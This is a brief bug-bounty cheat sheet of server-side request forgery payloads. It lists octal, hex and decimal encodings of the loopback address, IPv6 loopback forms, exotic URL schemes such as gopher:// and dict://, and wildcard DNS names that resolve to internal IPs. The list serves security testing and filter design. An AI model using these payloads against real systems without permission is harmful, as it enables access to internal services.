bugbounty-cheatsheet/cheatsheets/ssrf.md
2017-07-22 11:19:51 -07:00

567 B

SSRF

http://0177.1/
http://0x7f.1/
https://520968996

Note: The latter can be calculated using http://www.subnetmask.info/

Exotic Handlers

gopher://, dict://, php://, jar://, tftp://

IPv6

http://[::1]
http://[::]

Wildcard DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http://nip.io